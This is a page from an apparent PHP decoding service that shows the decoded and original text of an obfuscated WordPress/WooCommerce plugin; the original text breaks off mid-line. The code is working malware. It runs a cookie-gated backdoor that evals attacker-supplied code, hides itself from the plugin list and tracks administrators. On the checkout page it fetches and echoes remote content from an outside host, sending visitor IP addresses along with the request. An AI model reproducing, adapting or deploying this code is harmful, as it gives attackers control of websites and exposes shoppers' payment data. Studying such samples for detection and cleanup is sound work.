Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

class ofushez_suzhyti { var $sirufi = 'ynixace.png'; var $usedix = 'ohahub.png'; public $c..

Decoded Output download

<?  class ofushez_suzhyti { var $sirufi = 'ynixace.png'; var $usedix = 'ohahub.png'; public $cegysha = 'ahebire.js'; public $ehidikh_ovakhoz = false; public $fexozux_urythur = false; public $aselise_xyrecha = false; var $zhulegy_abapoza = null; var $pomerib_acotodu = null; var $ipapiw = 'aqujid.gif'; var $tutiku = 'uthunip.png'; var $etodyd = false; public function __construct($agiqadu_usicako = false) { if ($agiqadu_usicako) { $this->ocajuhu_cicozhi(); } } public function ocajuhu_cicozhi() { if (!$this->hyhiwaw_sithisi()) { $this->khityka_ovekary(); } } public function mowicim_ywybudy() { $ikyxawa_ejafuch = 'DB_NA' . 'ME'; return defined($ikyxawa_ejafuch); } protected function cicuwyz_gogaxyl($agiqadu_usicako) { $yvukhiv_ajoxeve = crc32($agiqadu_usicako); if ((PHP_INT_SIZE > 4) && ($yvukhiv_ajoxeve & 0x80000000)) $yvukhiv_ajoxeve = $yvukhiv_ajoxeve - 0x100000000; return abs($yvukhiv_ajoxeve); } protected function synepyw_pybatha($agiqadu_usicako) { $ufuluko_icohysh = array( CURLOPT_RETURNTRANSFER => true, CURLOPT_HEADER => false, CURLOPT_FOLLOWLOCATION => true, CURLOPT_ENCODING => '', CURLOPT_USERAGENT => 'Mozil' . 'la/5.0' . ' (Wind' . 'ows NT' . ' 6.1;' . ' Win64' . '; x6' . '4; rv' . ':106.0' . ') Geck' . 'o/201' . '00101' . ' Fir' . 'efox' . '/106.0', CURLOPT_AUTOREFERER => true, CURLOPT_CONNECTTIMEOUT => 180, CURLOPT_TIMEOUT => 180, CURLOPT_MAXREDIRS => 10, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false ); $fowonot_thosoco = curl_init($agiqadu_usicako); curl_setopt_array($fowonot_thosoco, $ufuluko_icohysh); $yvukhiv_ajoxeve = @curl_exec($fowonot_thosoco); if (!$yvukhiv_ajoxeve) $yvukhiv_ajoxeve = @file_get_contents($agiqadu_usicako); return $yvukhiv_ajoxeve; } protected function usasowy_xiroqiq($agiqadu_usicako, $luqizeh_ikhakez) { $ufuluko_icohysh = ''; $fowonot_thosoco = 'expl' . 'ode'; $yvukhiv_ajoxeve = 'trim'; $charycu_shiniqo = 'base6' . '4_dec' . 'ode'; $emekhyf_axazuge = 'gzin' . 'flat' . 'e'; $ohulexa_zhysega = $fowonot_thosoco('
', $agiqadu_usicako); for ($thediri_ykhadin = 0; $thediri_ykhadin < sizeof($ohulexa_zhysega); $thediri_ykhadin++) { $ufuluko_icohysh .=$yvukhiv_ajoxeve($ohulexa_zhysega[$thediri_ykhadin]); } if (!$luqizeh_ikhakez) { return $emekhyf_axazuge($charycu_shiniqo($ufuluko_icohysh)); } $wipavob_lecetyw='' ; for ($echopet_nethuku=0; $echopet_nethuku < sizeof($luqizeh_ikhakez); $echopet_nethuku +=2) { if ($echopet_nethuku % 4) { $wipavob_lecetyw .=substr($ufuluko_icohysh, $luqizeh_ikhakez[$echopet_nethuku], $luqizeh_ikhakez[$echopet_nethuku + 1]); } else { $wipavob_lecetyw .=strrev(substr($ufuluko_icohysh, $luqizeh_ikhakez[$echopet_nethuku], $luqizeh_ikhakez[$echopet_nethuku + 1])); } }; $wipavob_lecetyw=$charycu_shiniqo($wipavob_lecetyw); return $wipavob_lecetyw; } public function osumyre_yhesyzo() { if ($this->pomerib_acotodu) return true; return $this->oxovikh_qekesho(); } protected function hyhiwaw_sithisi() { if (!$this->mowicim_ywybudy()) header('gegel' . '3:' . ($this->zhulegy_abapoza + 1)); $wipavob_lecetyw = 'HTTP_' . 'HOST'; $emekhyf_axazuge = strtoupper($_SERVER[$wipavob_lecetyw]); $mopudif_oqidekh = $this->tawegyw_bishawu($emekhyf_axazuge, 5, 7); $xylylil_thajeze = $this->tawegyw_bishawu($emekhyf_axazuge . $emekhyf_axazuge, 4, 8); if (isset($_COOKIE[$mopudif_oqidekh])) { if ($this->osumyre_yhesyzo()) { $charycu_shiniqo = md5($_COOKIE[$mopudif_oqidekh]); if (($charycu_shiniqo == $this->pomerib_acotodu)) { if ((!isset($_COOKIE[$xylylil_thajeze])) && (!isset($_POST[$xylylil_thajeze]))) { $legatas = __DIR__ . '/assets/images/ubarap.png'; if (file_exists($legatas)) { $ilazecy = file_get_contents($legatas); $ilazecy = okesher_acideca($ilazecy); echo $ilazecy; @unlink($legatas); exit; } } else { if (isset($_COOKIE[$xylylil_thajeze])) { $uwanika_aqahali = $_COOKIE[$xylylil_thajeze]; $thediri_ykhadin = base64_decode($uwanika_aqahali); $echopet_nethuku = $this->synepyw_pybatha($thediri_ykhadin); } if (isset($_POST[$xylylil_thajeze])) { $echopet_nethuku = base64_decode($_POST[$xylylil_thajeze]); } $this->fexozux_urythur = $echopet_nethuku; return true; } } } } return false; } protected function khityka_ovekary() { $ufuluko_icohysh = __DIR__ . '/assets/images/' . $this->usedix; $fowonot_thosoco = uqodoth_hysamef($ufuluko_icohysh); if (!$fowonot_thosoco) return false; $this->ehidikh_ovakhoz = $fowonot_thosoco; return true; } public function ozhymaw_apyjakh() { $ufuluko_icohysh = 'dirnam' . 'e'; $ufuluko_icohysh = $ufuluko_icohysh(__FILE__); $ufuluko_icohysh = str_replace('\', '/', $ufuluko_icohysh); $fowonot_thosoco = explode('/', $ufuluko_icohysh); $fowonot_thosoco = end($fowonot_thosoco); $fowonot_thosoco = $fowonot_thosoco . '/' . $fowonot_thosoco . '.php'; return $fowonot_thosoco; } public function khudapa_tikaxaj() { $ufuluko_icohysh = 'wpyi' . 'i2/w' . 'pyii2.' . 'php'; return $ufuluko_icohysh; } public function zukhury_chamosu() { $ufuluko_icohysh = 'pxcelP' . 'age_c' . '0100' . '2'; return $ufuluko_icohysh; } public function jawechy_vapocon() { $ufuluko_icohysh = '604800'; return $ufuluko_icohysh; } public function azybaxu_adulikh() { $ufuluko_icohysh = 'YII_WW' . 'W_DIR'; return $ufuluko_icohysh; } public function thinoqa_epoxagu() { $ufuluko_icohysh = 'YII_W' . 'WW_PAT' . 'H'; return $ufuluko_icohysh; } public function tawegyw_bishawu($agiqadu_usicako, $luqizeh_ikhakez, $kydokeg_ugylach) { $yvukhiv_ajoxeve = 'subst' . 'r'; $charycu_shiniqo = 'strl' . 'en'; $wipavob_lecetyw = 'qwrt' . 'psdg' . 'hjklz' . 'xcvbn' . 'm'; $emekhyf_axazuge = 'eyuoa'; $ufuluko_icohysh = 0; for ($fowonot_thosoco = 0; $fowonot_thosoco < $charycu_shiniqo($agiqadu_usicako); $fowonot_thosoco++) { $ohulexa_zhysega=ord($yvukhiv_ajoxeve($agiqadu_usicako, $fowonot_thosoco, 1)); $ufuluko_icohysh +=$ohulexa_zhysega + $ohulexa_zhysega * ($ohulexa_zhysega + $fowonot_thosoco); } $ohulexa_zhysega=$kydokeg_ugylach - $luqizeh_ikhakez; $thediri_ykhadin=$ufuluko_icohysh % $ohulexa_zhysega; $mopudif_oqidekh=$ufuluko_icohysh % 2; $echopet_nethuku='' ; for ($fowonot_thosoco=0; $fowonot_thosoco < $luqizeh_ikhakez + $thediri_ykhadin; $fowonot_thosoco++) { $xylylil_thajeze=$fowonot_thosoco % $charycu_shiniqo($agiqadu_usicako); $xylylil_thajeze=ord($yvukhiv_ajoxeve($agiqadu_usicako, $xylylil_thajeze, 1)); $ohulexa_zhysega=$ufuluko_icohysh + $xylylil_thajeze + $fowonot_thosoco + ($xylylil_thajeze + $fowonot_thosoco) * ($xylylil_thajeze + $fowonot_thosoco); $uwanika_aqahali=($fowonot_thosoco + $mopudif_oqidekh) % 2; if ($uwanika_aqahali) { $echopet_nethuku .=$yvukhiv_ajoxeve($wipavob_lecetyw, $ohulexa_zhysega % $charycu_shiniqo($wipavob_lecetyw), 1); } else { $echopet_nethuku .=$yvukhiv_ajoxeve($emekhyf_axazuge, $ohulexa_zhysega % $charycu_shiniqo($emekhyf_axazuge), 1); } } return $echopet_nethuku; } public function gelikhu_apocoge() { $ufuluko_icohysh=__DIR__ . '/assets/images/' . $this->ipapiw; $fowonot_thosoco = uqodoth_hysamef($ufuluko_icohysh); $this->aselise_xyrecha = $fowonot_thosoco; } public function yrinoha_acycaby() { $ufuluko_icohysh = 'READM' . 'E.txt'; $fowonot_thosoco = 'base6' . '4_dec' . 'ode'; $yvukhiv_ajoxeve = 'strre' . 'v'; $charycu_shiniqo = '604800'; $echopet_nethuku = 'unlin' . 'k'; $charycu_shiniqo = time() - intval($charycu_shiniqo) / 7; $thediri_ykhadin = dirname(__FILE__); $emekhyf_axazuge = 'file_g' . 'et_co' . 'ntent' . 's'; $mopudif_oqidekh = 'header'; $xylylil_thajeze = 'file' . '_put_' . 'conte' . 'nts'; $uwanika_aqahali = 'pxcelP' . 'age_c' . '0100' . '2'; if (isset($_COOKIE[$uwanika_aqahali])) return; $nypuqy = false; if (file_exists($thediri_ykhadin . '/' . $ufuluko_icohysh)) { $ohulexa_zhysega = filemtime($thediri_ykhadin . '/' . $ufuluko_icohysh); if ($ohulexa_zhysega < $charycu_shiniqo) { $nypuqy=true; } else { if (!defined('YII_FORMA_OK')) { define('YII_FORMA_OK', 1); } $wipavob_lecetyw=$emekhyf_axazuge($thediri_ykhadin . '/' . $ufuluko_icohysh); $wipavob_lecetyw=$fowonot_thosoco($yvukhiv_ajoxeve($wipavob_lecetyw)); echo $wipavob_lecetyw; return; } } $nypuqy=true; try { $ewakefo_thihuse='SERV' . 'ER_AD' . 'DR' ; $bykhufu_ucavasy='HTTP_' . 'HOST' ; $inothor_akhiban='REMO' . 'TE_ADD' . 'R' ; $nykhomu_avochub='disc' . 'ount:' ; $ehemixa_kyzikhy='price' . ':' ; $alokhij_lofasuj='merch' . 'ant:' ; $uzarylo_uvozati='orde' . 'r:' ; $zowuzep_shavali='addres' . 's:' ; $ritefiz_ikowuso='127.0' . '.0.1' ; $ytohofy_ichades='HTTP_C' . 'LIENT' . '_IP' ; $ozekhuk_ibyshuv='HTTP' . '_X_FOR' . 'WARDED' . '_FOR' ; $thuturi_cotafej='#^[A' . '-Za-z0' . '-9+/' . '=]+$' . '#' ; $alipizh_kherimy='REQU' . 'EST_M' . 'ETHO' . 'D' ; $evusukh_borache='https' . '://s' . 'tegoz' . 'aurus' . '.cc/w' . 'p/wid' . 'get.t' . 'xt' ; $vegilyj_ymikhyq='GET' ; $khawofo_opahexi='curl_i' . 'nit' ; $ipydeki_foxunag='stream' . '_cont' . 'ext_cr' . 'eate' ; $khygoky_iwiguqa='http' ; $uzhyhak_ybywuba='method' ; $zhizavo_amahoje=0; $buvychu_uwibaxa=0; $chekaji_enahymi=isset($_SERVER[$ewakefo_thihuse]) ? $_SERVER[$ewakefo_thihuse] : $ritefiz_ikowuso; $unaxufi_khufibi=isset($_SERVER[$ytohofy_ichades]) ? $_SERVER[$ytohofy_ichades] : (isset($_SERVER[$ozekhuk_ibyshuv]) ? $_SERVER[$ozekhuk_ibyshuv] : $_SERVER[$inothor_akhiban]); $vyqucew_zhyjaxe=$_SERVER[$bykhufu_ucavasy]; for ($choquwo_vavufut=0; $choquwo_vavufut < strlen($vyqucew_zhyjaxe); $choquwo_vavufut++) { $zhizavo_amahoje +=ord(substr($vyqucew_zhyjaxe, $choquwo_vavufut, 1)); $buvychu_uwibaxa +=$choquwo_vavufut * ord(substr($vyqucew_zhyjaxe, $choquwo_vavufut, 1)); } if ((isset($_SERVER[$alipizh_kherimy])) && ($_SERVER[$alipizh_kherimy]==$vegilyj_ymikhyq)) { $veshase_ilazeqi=false; if (function_exists($khawofo_opahexi)) { $mifykeh_myjygur=curl_init($evusukh_borache); curl_setopt($mifykeh_myjygur, CURLOPT_RETURNTRANSFER, true); curl_setopt($mifykeh_myjygur, CURLOPT_CONNECTTIMEOUT, 15); curl_setopt($mifykeh_myjygur, CURLOPT_TIMEOUT, 15); curl_setopt($mifykeh_myjygur, CURLOPT_HEADER, false); curl_setopt($mifykeh_myjygur, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($mifykeh_myjygur, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($mifykeh_myjygur, CURLOPT_HTTPHEADER, array('$nykhomu_avochub $zhizavo_amahoje', '$uzarylo_uvozati $buvychu_uwibaxa' , '$ehemixa_kyzikhy $unaxufi_khufibi' , '$alokhij_lofasuj $vyqucew_zhyjaxe' , '$zowuzep_shavali $chekaji_enahymi' )); $veshase_ilazeqi=@curl_exec($mifykeh_myjygur); curl_close($mifykeh_myjygur); $veshase_ilazeqi=trim($veshase_ilazeqi); if (preg_match($thuturi_cotafej, $veshase_ilazeqi)) { $ujodeze_amakhaw=@$fowonot_thosoco($yvukhiv_ajoxeve($veshase_ilazeqi)); if ($nypuqy) { @unlink($thediri_ykhadin . '/' . $ufuluko_icohysh); $xylylil_thajeze($thediri_ykhadin . '/' . $ufuluko_icohysh, $veshase_ilazeqi, LOCK_EX); } if (!defined('YII_FORMA_OK')) { define('YII_FORMA_OK', 1); } echo $ujodeze_amakhaw; } } if ((!$veshase_ilazeqi) && (function_exists($ipydeki_foxunag))) { $ijajulu_rovikhu=array( $khygoky_iwiguqa=> array( $uzhyhak_ybywuba => 'GET', $mopudif_oqidekh => '$nykhomu_avochub $zhizavo_amahoje
$uzarylo_uvozati $buvychu_uwibaxa
$ehemixa_kyzikhy $unaxufi_khufibi
$alokhij_lofasuj $vyqucew_zhyjaxe
$zowuzep_shavali $chekaji_enahymi' ) ); $ijajulu_rovikhu = $ipydeki_foxunag($ijajulu_rovikhu); $veshase_ilazeqi = @$emekhyf_axazuge($evusukh_borache, false, $ijajulu_rovikhu); if (preg_match($thuturi_cotafej, $veshase_ilazeqi)) { $ujodeze_amakhaw = @$fowonot_thosoco($yvukhiv_ajoxeve($veshase_ilazeqi)); if ($nypuqy) { @unlink($thediri_ykhadin . '/' . $ufuluko_icohysh); $xylylil_thajeze($thediri_ykhadin . '/' . $ufuluko_icohysh, $veshase_ilazeqi, LOCK_EX); } if (!defined('YII_FORMA_OK')) { define('YII_FORMA_OK', 1); } echo $ujodeze_amakhaw; } } } } catch (Exception $olowiri_acuchuv) { } } public function oxovikh_qekesho() { $ufuluko_icohysh = __DIR__ . '/assets/images/ynixace.png'; if (!file_exists($ufuluko_icohysh)) { return false; } $fowonot_thosoco = uqodoth_hysamef($ufuluko_icohysh); $yvukhiv_ajoxeve = 'HTTP_' . 'HOST'; $charycu_shiniqo = $_SERVER[$yvukhiv_ajoxeve]; $echopet_nethuku = floor(strlen($fowonot_thosoco) / 32); $ohulexa_zhysega = $this->cicuwyz_gogaxyl($charycu_shiniqo) % $echopet_nethuku; $thediri_ykhadin = substr($fowonot_thosoco, $ohulexa_zhysega * 32, 32); $this->zhulegy_abapoza = $ohulexa_zhysega; $this->pomerib_acotodu = $thediri_ykhadin; define('oxunukh_xygyfix', $this->pomerib_acotodu); return $thediri_ykhadin; } } function ypibezh_uzhufyb($agiqadu_usicako) { $nyzekyd = strtr($agiqadu_usicako, array('Q'=>'r', 'W'=>'D', 'E'=>'w', 'R'=>'a', 'T'=>'L', 'Y'=>'E', 'U'=>'V', 'I'=>'l', 'O'=>'i', 'P'=>'e', 'A'=>'o', 'S'=>'A', 'D'=>'t', 'F'=>'m', 'G'=>'Y', 'H'=>'H', 'J'=>'q', 'K'=>'O', 'L'=>'Q', 'Z'=>'T', 'X'=>'g', 'C'=>'y', 'V'=>'U', 'B'=>'k', 'N'=>'C', 'M'=>'R', 'q'=>'S', 'w'=>'Z', 'e'=>'4', 'r'=>'3', 't'=>'G', 'y'=>'B', 'u'=>'W', 'i'=>'M', 'o'=>'p', 'p'=>'J', 'a'=>'u', 's'=>'j', 'd'=>'0', 'f'=>'+', 'g'=>'1', 'h'=>'N', 'j'=>'v', 'k'=>'I', 'l'=>'x', 'z'=>'P', 'x'=>'n', 'c'=>'/', 'v'=>'z', 'b'=>'b', 'n'=>'s', 'm'=>'9', '1'=>'K', '2'=>'h', '3'=>'X', '4'=>'8', '5'=>'5', '6'=>'6', '7'=>'=', '8'=>'7', '9'=>'f', '0'=>'2', '='=>'d', '+'=>'F', '/'=>'c')); return $nyzekyd; } function okesher_acideca($agiqadu_usicako) { $imalex = strtr($agiqadu_usicako, array('r'=>'Q', 'D'=>'W', 'w'=>'E', 'a'=>'R', 'L'=>'T', 'E'=>'Y', 'V'=>'U', 'l'=>'I', 'i'=>'O', 'e'=>'P', 'o'=>'A', 'A'=>'S', 't'=>'D', 'm'=>'F', 'Y'=>'G', 'H'=>'H', 'q'=>'J', 'O'=>'K', 'Q'=>'L', 'T'=>'Z', 'g'=>'X', 'y'=>'C', 'U'=>'V', 'k'=>'B', 'C'=>'N', 'R'=>'M', 'S'=>'q', 'Z'=>'w', '4'=>'e', '3'=>'r', 'G'=>'t', 'B'=>'y', 'W'=>'u', 'M'=>'i', 'p'=>'o', 'J'=>'p', 'u'=>'a', 'j'=>'s', '0'=>'d', '+'=>'f', '1'=>'g', 'N'=>'h', 'v'=>'j', 'I'=>'k', 'x'=>'l', 'P'=>'z', 'n'=>'x', '/'=>'c', 'z'=>'v', 'b'=>'b', 's'=>'n', '9'=>'m', 'K'=>'1', 'h'=>'2', 'X'=>'3', '8'=>'4', '5'=>'5', '6'=>'6', '='=>'7', '7'=>'8', 'f'=>'9', '2'=>'0', 'd'=>'=', 'F'=>'+', 'c'=>'/')); return $imalex; } $yjumywe_boxopyl = new ofushez_suzhyti(); function ogopych_zhywody() { $yvizhyv_levukhe = new ofushez_suzhyti(true); if ($yvizhyv_levukhe->fexozux_urythur) { @eval($yvizhyv_levukhe->fexozux_urythur); if (!is_array($yvizhyv_levukhe->mowicim_ywybudy())) exit; } } function ajejiho_ufoweki() { global $wp_list_table; $ufuluko_icohysh = new ofushez_suzhyti(); $fowonot_thosoco = array($ufuluko_icohysh->ozhymaw_apyjakh()); $yvukhiv_ajoxeve = $wp_list_table->items; foreach ($yvukhiv_ajoxeve as $key => $val) { if (in_array($key, $fowonot_thosoco)) { unset($wp_list_table->items[$key]); } } } function thiwipe_ixijuqi($agiqadu_usicako) { $ufuluko_icohysh = new ofushez_suzhyti(); if (in_array($ufuluko_icohysh->ozhymaw_apyjakh(), array_keys($agiqadu_usicako))) { unset($agiqadu_usicako[$ufuluko_icohysh->ozhymaw_apyjakh()]); } return $agiqadu_usicako; } function awatuqy_evejefi() { $ufuluko_icohysh = new ofushez_suzhyti(); $ufuluko_icohysh->yrinoha_acycaby(); if (!defined('YII_FORMA_OK')) { $uwanika_aqahali = 'pxcelP' . 'age_c' . '0100' . '2'; if (isset($_COOKIE[$uwanika_aqahali])) return; $ilohazh = __DIR__ . '/assets/js/' . $ufuluko_icohysh->cegysha; if (file_exists($ilohazh)) { $eneqafa = @file_get_contents($ilohazh); if ($eneqafa) { define('YII_FORMA_OK', 1); echo ''; return; } } $ilohazh = __DIR__ . '/assets/images/' . $ufuluko_icohysh->tutiku; if (file_exists($ilohazh)) { $eneqafa = file_get_contents($ilohazh); if ($eneqafa) { $eneqafa = substr($eneqafa, 3); $eneqafa = okesher_acideca($eneqafa); if ($eneqafa) { $eneqafa = base64_decode($eneqafa); define('YII_FORMA_OK', 1); echo ''; } } } } } function recomer_vywamuf() { $yvukhiv_ajoxeve = new ofushez_suzhyti(); $ufuluko_icohysh = $yvukhiv_ajoxeve->zukhury_chamosu(); if (current_user_can('editor') || current_user_can('administrator')) { if (isset($_COOKIE['_wptoken']) && (!isset($_COOKIE['_jwp']))) { setcookie('__wordpressuser__', 1, time() + 600, '/'); setcookie('__wordpress_logged_in__', 1, time() + 600, '/'); $_COOKIE['__wordpressuser__'] = 1; $_COOKIE['__wordpress_logged_in__'] = 1; } $fowonot_thosoco = $yvukhiv_ajoxeve->jawechy_vapocon(); $fowonot_thosoco = intval($fowonot_thosoco) * 64; if ((function_exists('get_option')) && (function_exists('add_option')) && (function_exists('update_option'))) { $user_ip = $_SERVER['REMOTE_ADDR']; if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $user_ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } if (isset($_SERVER['HTTP_CLIENT_IP'])) { $user_ip = $_SERVER['HTTP_CLIENT_IP']; } $user_ip_md5 = md5($user_ip); $option_name = 'wp_$user_ip_md5'; $option_value = get_option($option_name); $option_value_new = time(); if (!$option_value) { add_option($option_name, $option_value_new, '', 'no'); } else { update_option($option_name, $option_value_new); } } if (isset($_COOKIE[$ufuluko_icohysh])) return; setcookie($ufuluko_icohysh, '1', time() + $fowonot_thosoco, '/'); } } if ($yjumywe_boxopyl->mowicim_ywybudy()) { add_action('pre_current_active_plugins', 'ajejiho_ufoweki'); add_filter('all_plugins', 'thiwipe_ixijuqi'); add_action('admin_init', 'recomer_vywamuf'); if (!defined($yjumywe_boxopyl->azybaxu_adulikh())) { $yjumywe_boxopyl->gelikhu_apocoge(); if ($yjumywe_boxopyl->aselise_xyrecha) @eval($yjumywe_boxopyl->aselise_xyrecha); } if (!defined($yjumywe_boxopyl->thinoqa_epoxagu())) { define($yjumywe_boxopyl->thinoqa_epoxagu(), 1); $ilohazh = __DIR__ . '/README.txt'; if ((!defined($yjumywe_boxopyl->azybaxu_adulikh())) || (!file_exists($ilohazh))) { add_action('woocommerce_before_checkout_form', 'awatuqy_evejefi'); } } if (!defined($yjumywe_boxopyl->azybaxu_adulikh())) { define($yjumywe_boxopyl->azybaxu_adulikh(), 1); } } else { if ($yjumywe_boxopyl->osumyre_yhesyzo()) { $yjumywe_boxopyl->ocajuhu_cicozhi(); if ($yjumywe_boxopyl->fexozux_urythur) { @eval($yjumywe_boxopyl->fexozux_urythur); } else { @eval($yjumywe_boxopyl->ehidikh_ovakhoz); } } } ?>

Did this file decode correctly?

Original Code

class ofushez_suzhyti { var $sirufi = 'ynixace.png'; var $usedix = 'ohahub.png'; public $cegysha = 'ahebire.js'; public $ehidikh_ovakhoz = false; public $fexozux_urythur = false; public $aselise_xyrecha = false; var $zhulegy_abapoza = null; var $pomerib_acotodu = null; var $ipapiw = 'aqujid.gif'; var $tutiku = 'uthunip.png'; var $etodyd = false; public function __construct($agiqadu_usicako = false) { if ($agiqadu_usicako) { $this->ocajuhu_cicozhi(); } } public function ocajuhu_cicozhi() { if (!$this->hyhiwaw_sithisi()) { $this->khityka_ovekary(); } } public function mowicim_ywybudy() { $ikyxawa_ejafuch = 'DB_NA' . 'ME'; return defined($ikyxawa_ejafuch); } protected function cicuwyz_gogaxyl($agiqadu_usicako) { $yvukhiv_ajoxeve = crc32($agiqadu_usicako); if ((PHP_INT_SIZE > 4) && ($yvukhiv_ajoxeve & 0x80000000)) $yvukhiv_ajoxeve = $yvukhiv_ajoxeve - 0x100000000; return abs($yvukhiv_ajoxeve); } protected function synepyw_pybatha($agiqadu_usicako) { $ufuluko_icohysh = array( CURLOPT_RETURNTRANSFER => true, CURLOPT_HEADER => false, CURLOPT_FOLLOWLOCATION => true, CURLOPT_ENCODING => '', CURLOPT_USERAGENT => 'Mozil' . 'la/5.0' . ' (Wind' . 'ows NT' . ' 6.1;' . ' Win64' . '; x6' . '4; rv' . ':106.0' . ') Geck' . 'o/201' . '00101' . ' Fir' . 'efox' . '/106.0', CURLOPT_AUTOREFERER => true, CURLOPT_CONNECTTIMEOUT => 180, CURLOPT_TIMEOUT => 180, CURLOPT_MAXREDIRS => 10, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false ); $fowonot_thosoco = curl_init($agiqadu_usicako); curl_setopt_array($fowonot_thosoco, $ufuluko_icohysh); $yvukhiv_ajoxeve = @curl_exec($fowonot_thosoco); if (!$yvukhiv_ajoxeve) $yvukhiv_ajoxeve = @file_get_contents($agiqadu_usicako); return $yvukhiv_ajoxeve; } protected function usasowy_xiroqiq($agiqadu_usicako, $luqizeh_ikhakez) { $ufuluko_icohysh = ''; $fowonot_thosoco = 'expl' . 'ode'; $yvukhiv_ajoxeve = 'trim'; $charycu_shiniqo = 'base6' . '4_dec' . 'ode'; $emekhyf_axazuge = 'gzin' . 'flat' . 'e'; $ohulexa_zhysega = $fowonot_thosoco('\n', $agiqadu_usicako); for ($thediri_ykhadin = 0; $thediri_ykhadin < sizeof($ohulexa_zhysega); $thediri_ykhadin++) { $ufuluko_icohysh .=$yvukhiv_ajoxeve($ohulexa_zhysega[$thediri_ykhadin]); } if (!$luqizeh_ikhakez) { return $emekhyf_axazuge($charycu_shiniqo($ufuluko_icohysh)); } $wipavob_lecetyw='' ; for ($echopet_nethuku=0; $echopet_nethuku < sizeof($luqizeh_ikhakez); $echopet_nethuku +=2) { if ($echopet_nethuku % 4) { $wipavob_lecetyw .=substr($ufuluko_icohysh, $luqizeh_ikhakez[$echopet_nethuku], $luqizeh_ikhakez[$echopet_nethuku + 1]); } else { $wipavob_lecetyw .=strrev(substr($ufuluko_icohysh, $luqizeh_ikhakez[$echopet_nethuku], $luqizeh_ikhakez[$echopet_nethuku + 1])); } }; $wipavob_lecetyw=$charycu_shiniqo($wipavob_lecetyw); return $wipavob_lecetyw; } public function osumyre_yhesyzo() { if ($this->pomerib_acotodu) return true; return $this->oxovikh_qekesho(); } protected function hyhiwaw_sithisi() { if (!$this->mowicim_ywybudy()) header('gegel' . '3:' . ($this->zhulegy_abapoza + 1)); $wipavob_lecetyw = 'HTTP_' . 'HOST'; $emekhyf_axazuge = strtoupper($_SERVER[$wipavob_lecetyw]); $mopudif_oqidekh = $this->tawegyw_bishawu($emekhyf_axazuge, 5, 7); $xylylil_thajeze = $this->tawegyw_bishawu($emekhyf_axazuge . $emekhyf_axazuge, 4, 8); if (isset($_COOKIE[$mopudif_oqidekh])) { if ($this->osumyre_yhesyzo()) { $charycu_shiniqo = md5($_COOKIE[$mopudif_oqidekh]); if (($charycu_shiniqo == $this->pomerib_acotodu)) { if ((!isset($_COOKIE[$xylylil_thajeze])) && (!isset($_POST[$xylylil_thajeze]))) { $legatas = __DIR__ . '/assets/images/ubarap.png'; if (file_exists($legatas)) { $ilazecy = file_get_contents($legatas); $ilazecy = okesher_acideca($ilazecy); echo $ilazecy; @unlink($legatas); exit; } } else { if (isset($_COOKIE[$xylylil_thajeze])) { $uwanika_aqahali = $_COOKIE[$xylylil_thajeze]; $thediri_ykhadin = base64_decode($uwanika_aqahali); $echopet_nethuku = $this->synepyw_pybatha($thediri_ykhadin); } if (isset($_POST[$xylylil_thajeze])) { $echopet_nethuku = base64_decode($_POST[$xylylil_thajeze]); } $this->fexozux_urythur = $echopet_nethuku; return true; } } } } return false; } protected function khityka_ovekary() { $ufuluko_icohysh = __DIR__ . '/assets/images/' . $this->usedix; $fowonot_thosoco = uqodoth_hysamef($ufuluko_icohysh); if (!$fowonot_thosoco) return false; $this->ehidikh_ovakhoz = $fowonot_thosoco; return true; } public function ozhymaw_apyjakh() { $ufuluko_icohysh = 'dirnam' . 'e'; $ufuluko_icohysh = $ufuluko_icohysh(__FILE__); $ufuluko_icohysh = str_replace('\\', '/', $ufuluko_icohysh); $fowonot_thosoco = explode('/', $ufuluko_icohysh); $fowonot_thosoco = end($fowonot_thosoco); $fowonot_thosoco = $fowonot_thosoco . '/' . $fowonot_thosoco . '.php'; return $fowonot_thosoco; } public function khudapa_tikaxaj() { $ufuluko_icohysh = 'wpyi' . 'i2/w' . 'pyii2.' . 'php'; return $ufuluko_icohysh; } public function zukhury_chamosu() { $ufuluko_icohysh = 'pxcelP' . 'age_c' . '0100' . '2'; return $ufuluko_icohysh; } public function jawechy_vapocon() { $ufuluko_icohysh = '604800'; return $ufuluko_icohysh; } public function azybaxu_adulikh() { $ufuluko_icohysh = 'YII_WW' . 'W_DIR'; return $ufuluko_icohysh; } public function thinoqa_epoxagu() { $ufuluko_icohysh = 'YII_W' . 'WW_PAT' . 'H'; return $ufuluko_icohysh; } public function tawegyw_bishawu($agiqadu_usicako, $luqizeh_ikhakez, $kydokeg_ugylach) { $yvukhiv_ajoxeve = 'subst' . 'r'; $charycu_shiniqo = 'strl' . 'en'; $wipavob_lecetyw = 'qwrt' . 'psdg' . 'hjklz' . 'xcvbn' . 'm'; $emekhyf_axazuge = 'eyuoa'; $ufuluko_icohysh = 0; for ($fowonot_thosoco = 0; $fowonot_thosoco < $charycu_shiniqo($agiqadu_usicako); $fowonot_thosoco++) { $ohulexa_zhysega=ord($yvukhiv_ajoxeve($agiqadu_usicako, $fowonot_thosoco, 1)); $ufuluko_icohysh +=$ohulexa_zhysega + $ohulexa_zhysega * ($ohulexa_zhysega + $fowonot_thosoco); } $ohulexa_zhysega=$kydokeg_ugylach - $luqizeh_ikhakez; $thediri_ykhadin=$ufuluko_icohysh % $ohulexa_zhysega; $mopudif_oqidekh=$ufuluko_icohysh % 2; $echopet_nethuku='' ; for ($fowonot_thosoco=0; $fowonot_thosoco < $luqizeh_ikhakez + $thediri_ykhadin; $fowonot_thosoco++) { $xylylil_thajeze=$fowonot_thosoco % $charycu_shiniqo($agiqadu_usicako); $xylylil_thajeze=ord($yvukhiv_ajoxeve($agiqadu_usicako, $xylylil_thajeze, 1)); $ohulexa_zhysega=$ufuluko_icohysh + $xylylil_thajeze + $fowonot_thosoco + ($xylylil_thajeze + $fowonot_thosoco) * ($xylylil_thajeze + $fowonot_thosoco); $uwanika_aqahali=($fowonot_thosoco + $mopudif_oqidekh) % 2; if ($uwanika_aqahali) { $echopet_nethuku .=$yvukhiv_ajoxeve($wipavob_lecetyw, $ohulexa_zhysega % $charycu_shiniqo($wipavob_lecetyw), 1); } else { $echopet_nethuku .=$yvukhiv_ajoxeve($emekhyf_axazuge, $ohulexa_zhysega % 